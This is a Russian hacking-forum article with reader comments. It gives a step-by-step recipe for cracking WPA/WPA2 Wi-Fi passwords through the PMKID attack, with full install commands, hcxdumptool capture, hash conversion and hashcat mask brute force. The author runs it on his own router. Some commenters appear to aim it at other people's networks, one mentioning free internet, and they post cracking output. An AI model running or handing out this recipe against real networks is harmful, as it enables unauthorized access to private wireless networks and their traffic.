• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

Статья Новый способ взлома Wi-Fi | август 2018

Всем огромный привет, дорогие форумчане. В этой статье я хотел бы рассказать о новом способе взлома пароля к сети Wi-Fi.

Протокол WPA/WPA2 морально и физически устарел, и всё уже давно идет к тому что этот протокол пора обновить! И одним из таких ключевых толчков, стала опубликованная уязвимость в октябре 2017г Mathy Vanhoef, в протоколе WPA2, которая получила название key reinstallation attack ( ). Конечно же, дыры прикрыли где смогли, но именно с этого момента началась разработка нового протокола шифрования WPA3 и
уже во всю проводит испытания нового протокола на потенциальные проблемы в протоколе, в рамках которого как раз и был выявлен новый вектор атаки на протокол WPA/WPA2.

Суть метода заключается в том что Вы можете получить идентификатор PMKID (Pairwise Master Key Identifier) в составе ответа EAPOL на запрос аутентификации (PMKID указывается в опциональном поле RSN IE (Robust Security Network Information Element)).

Наличие PMKID позволяет определить разделяемый ключ PSK (Pre-Shared Key, пароль к беспроводной сети) без непосредственного получения вычисленного на его основе PMK (Pairwise Master Key), передаваемого на этапе согласования соединения при успешной аутентификации нового пользователя. Основная разница этой атаки от существующих, в том что нет необходимости захватывать полное "рукопожатие", а достаточно одного кадра EOPOL, ну второе не менне важное - это то что нет необходимости ждать пользователя который подключиться к атакуемой сети, так как атака будет происходить непосредственно на саму AP.


И так для проведения атаки нам будет необходимо:
  1. Linux (в моем случае Linux parrot 4.16.0-parrot16-amd64)
  2. hcxtools
  3. hcxdumptool
  4. Hashcat v4.2.0
Для начала пройдемся по загрузке и установке:

Hcxtools (аналогично и для hcxdumptool)
  1. git clone ZerBea/hcxtools
  2. cd hcxtools
  3. make
  4. make install
Hashcat v4.2.0

Даже если у Вас уже установлен hashcat, но он ниже версии 4.2.0, то Вам нужно будет его удалить, затем скачать свежую версию и установить, как и я это делал, ну или обновить другим известным для Вас способом т.к. в старых версиях нет метода расшифровки PMKID для WPA/WPA2 (а именно 16800).
  1. git clone hashcat/hashcat
  2. cd hashcat
  3. make
  4. make install * (пояснения внизу)
Всю атаку я буду проводить на своем роутере. Марка Asus RT-N12C1. Прошивка последняя.

I. Переводим наш беспроводной интерфейс в режим монитора:
1 способ
Код:
airmon-ng start wlan0 (wlan0 - это Ваш интерфейс, посмотреть можно введя команду ifconfig)
airmon-ng check kill
2 способ
Код:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng check kill
II. Запускаем сканирование Wi-Fi сетей
airodump wlan0mon (wlan0 в зависимости от того каким способом пользовались)
мой тестовый Wi-Fi называется "Happy_New_Year"

1.png


Сохраняем BSSID нашей тестовой AP БЕЗ ДВОЕТОЧИЙ в файл... я это сделал следующей командой:

Код:
echo "60A44C55D7C0" > filter.txt
III. Запускаем Hcxdumptool
hcxdumptool -i wlan0 -o hash --filterlist=filter.txt --filtermode=2 --enable_status=1 , где
-i wlan0 -имя нашего сетевого интерфейса
-o hash - выходной файл в pcapng формате в котором есть строка PMKID с хешем
--filtermode=2 - указываем что наш filter.txt будет целевым списком
--filterlist=filter.txt - файл с BSSID который мы Вы сохранили
--enable_status=1 - включаем сообщения по маске ( EAPOL,PROBEREQUEST,AUTHENTICATON или ASSOCIATION )

3.png


после получения сообщения "FOUND PMKID" мы останавливаем работу скрипта, и как вы можете заметить мне пришло аж сразу 3 сообщения о найденных пакетах в которм содержится строка с хешем PMKID. И так, Hcxdumptool справился со своей задачей и нашел нужный пакет с хешем... идем дальше!:cool::cool::cool:


IV Запускаем hcxpcaptool

hcxpcaptool -z hash_crack hash ,где
-z hash_crack - выходной файл, с хешем PMKID очищенной от лишней инфы, для hashcat (hashmod -m 16800). преобразован в обычный текст.
hash - файл в pcapng формате (все собранные пакеты hcxdumptool)

4.png


В моем случае он обнаружил 3 пакета, как я уже говорил, и все данные записал в мой текстовый файл hash_crack..... в 3 строки. Как раз эти строки мы и будем расшифровывать в HASHCAT

5.png


V. Запускаем HASHCAT

hashcat -m 16800 -a 3 -w 3 hash_crack '?u?s?d23456A' --force ,где хочу только пояснить
-m 16800 - новый hashmod который появился в версии 4.2.0
?u?s?d?d?d?d?d6A - мой пароль по маске + 2 последних символа которых я знаю из этого пароля

7.png


1 день и 4 часа:eek: проверять я конечно же не буду!), но я добавил ее пару известных символов и перезапустил... вот результат...

8.png


пароль был успешно найден)))))

Вывод из всего этого могу сделать только один.... данный метод на голову выше своих предыдущих вариантов атаки, к тому же я посмотрел на скорость которая хоть и не намного выше чем в aircrack-ng, но все же, а если учесть то что у некоторых есть хорошие видеокарты, то это вообще отличное подспорье! к тому же нет больше необходимости ждать юзверя и перехватывать "рукопожатие" + этих скриптов в том что можно это все делать не на одной точке а на нескольких одновременно... добавив в первичный текстовый файл BSSID разных AP.


З.Ы. Трудности с которыми я столкнулся:
  1. наверно единственная была маленькая проблема при переустановке hashcat. После удаления (apt-get remove hashcat), перешел в папку свежескачанного скрипта.....
  2. make
  3. make install
и тут мне выдает ошибку - "include/ext_OpenCL.h:15:10: fatal error: CL/cl.h: No such file or directory #include <CL/cl.h>" , мол нет какой-то папки....так и правильно у меня в принципе не было OpenGL....так что порыскав, в течении пару минут нашел решение - apt-get install opencl-headers, после чего hashcat благополучно заработал!

На этом спешу откланяться!) Всем спасибо!
 
Перебор шёл на процессорной мощности или подключали GPU ? Перебор по этому хешу идёт быстрее чем в случае с перехватом обычного хендшейка ?
 
Перебор шёл на процессорной мощности или подключали GPU ? Перебор по этому хешу идёт быстрее чем в случае с перехватом обычного хендшейка ?
Да, только cpu! Скорость немного быстрее...обычный хедшейк у меня брутит со скоростью 1700, а pmkid 1850-1900
 
На будущее , сооруди себе машину на форточка с нормальными видюхами и используй ее для брута таких вещей! :)
 
  • Нравится
Реакции: valerian38
По скорости брута обычного WPA handshake и вышеупомянутого нового способа брута - скорость одинаковая в HashCat или же есть прирост?
 
Хорошая статья! надеюсь будут и другие качеством не хуже.
 
Ну и запарился же я что бы собрать эти утилиты под ubuntu 16...
В итоге дошёл до этапа дампа
Код:
hcxdumptool -i wlan0 -o hash --filterlist=filter.txt --filtermode=2 --enable_status=1

И сижу теперь как дурак, жду, когда поймается этот PMKID, но нифига не происходит. Ютуб смотрю, сеть не обрывается на устройстве, подключённом к моему вайфаю. Есть только надпись про то что Found authorized handshake и всё =(
Ниже пишет, что дропнуто полторы тысячи rx. Можно ли как-то ускорить этот процесс? И сколько он обычно занимает, в особенности когда нет подключённых клиентов =)

UPD: прошёл час, ни одного PMKID не появилось. Что делать?
Нашёлся второй авторизационный хэндшейк, а PMKID нету =(

UPD2: короче на третий час я вырубил эту тухлую тему. Попробую ещё на других вайфаях, но видимо тот, который делает IPad в режиме модема НЕУЯЗВИМ =)
 
Последнее редактирование:

разве не airodump-ng wlan0mon???

hcxdumptool -i wlan0 -o hash --filterlist=filter.txt --filtermode=2 --enable_status=1 , где
-i wlan0 -имя нашего сетевого интерфейса
разве после запуска карты в режим мониторигра она не пробретёт суфикс mon или после скана надо отрубать мониторинг ?
 


"Note: Based on the noise on the wifi channel it can take some time to recieve the PMKID. We recommend running hcxdumptool up to 10 minutes before aborting."

Здесь пишут, что надо подождать 10 минут, прежде чем обрывать. Видимо и правда работает одина раз на сотню вайфаев и если за 10 минут не нашло, то видимо и не найдёт.

Оказывается данная тема уже поднималась на этом форуме и чувак в этом сообщении (KRACK или взлом WPA2) пишет, что только ТПлинковскую точку смог вскрыть и то не меньше двух часов это у него заняло. Да и не на каждой карточке с режимом мониторинга она будет работать.
 
Последнее редактирование:
Здесь пишут, что надо подождать 10 минут, прежде чем обрывать.
А вот тут пишут

"Атака применима к любым сетям 802.11i/p/q/r с включенным румингом (поддерживается на большинстве современных точек доступа). Суть метода в возможности получения идентификатора PMKID (Pairwise Master Key Identifier) в составе ответа EAPOL на запрос аутентификации (PMKID указывается в опциональном поле RSN IE (Robust Security Network Information Element))."
 
А вот тут пишут

"Атака применима к любым сетям 802.11i/p/q/r с включенным румингом (поддерживается на большинстве современных точек доступа). Суть метода в возможности получения идентификатора PMKID (Pairwise Master Key Identifier) в составе ответа EAPOL на запрос аутентификации (PMKID указывается в опциональном поле RSN IE (Robust Security Network Information Element))."

Не совсем понял про опциональный режим. Это где указывается? В настройках ТД?
 
на 6-ти 1080 как быстро расшифровка будет идти?
 
  • Нравится
Реакции: Diae
Стоило поднести ноут к окну и убрать фильтр по макам... Так через 3 часа нашлось 2 PMKID.
Поскольку я не помню пароля вообще, приходится задавать маску
Guess.Mask.......: ?a?a?a?a?a?a?a?a [8]
Ну а прогнозируемая дата окончания перебора на моей видяхе 970-ой
Time.Estimated...: Next Big Bang (27009 years, 48 days)
Speed.Dev.#1.....: 58162 H/s

Наверное у меня нет шансов на узбек...
 
Последнее редактирование:
  • Нравится
Реакции: avazak и sosiskapi
Ну а прогнозируемая дата окончания перебора на моей видяхе 970-ой
Time.Estimated...: Next Big Bang (27009 years, 48 days)

Наверное у меня нет шансов на узбек...
Да ладно Вам, этож буквально "на днях"...))
А если серьезно, то купите что-нить более мощное... (для брутфорс, да еще для 4-х видях... вроде 8-позиционный пароль брутфорсился совсем не долго...
 
Да ладно Вам, этож буквально "на днях"...))
А если серьезно, то купите что-нить более мощное... (для брутфорс, да еще для 4-х видях... вроде 8-позиционный пароль брутфорсился совсем не долго...
И это ради халявного инета? Полагаю, что дешевле купить себе пожизненный тариф в сеть.
 
Вести с полей описываются русским словом из трёх букв.
Решил, что есть шанс подобрать эти два PMKID, если они состоят только из цифр, что встречается довольно часто и задал циферную маску из 8-ми символов. На это уже прогноз перебора всего 3 часа, но результата не получилось

Код:
Session..........: hashcat                       
Status...........: Exhausted
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: ../data/PMKID.txt
Time.Started.....: Wed Aug 15 02:46:53 2018 (3 hours, 11 mins)
Time.Estimated...: Wed Aug 15 05:58:23 2018 (0 secs)
Guess.Mask.......: ?d?d?d?d?d?d?d?d [8]
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:    60925 H/s (24.99ms) @ Accel:32 Loops:32 Thr:1024 Vec:1
Recovered........: 0/7 (0.00%) Digests, 0/7 (0.00%) Salts
Progress.........: 700000000/700000000 (100.00%)
Rejected.........: 0/700000000 (0.00%)
Restore.Point....: 10000000/10000000 (100.00%)
Candidates.#1....: 68956464 -> 67646497
HWMon.Dev.#1.....: Temp: 75c Fan: 77% Util: 96% Core:1379MHz Mem:3004MHz Bus:16

Started: Wed Aug 15 02:46:50 2018
Stopped: Wed Aug 15 05:58:24 2018
 
UPD: прошёл час, ни одного PMKID не появилось. Что делать?
Нашёлся второй авторизационный хэндшейк, а PMKID нету =(
При установке не было ошибок? Я так и не смог установить без ошибок на kali linux 2018.2
Чего то не хватает, файлов библиотек, а без правильной установки никаких PMKID не поймает, хотя показывает работу, как будто ищет и такие же сообщения про хэндшейк.
В итоге установкой файлов библиотек загубил систему, теперь буду пробовать на виртуальной машине.
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab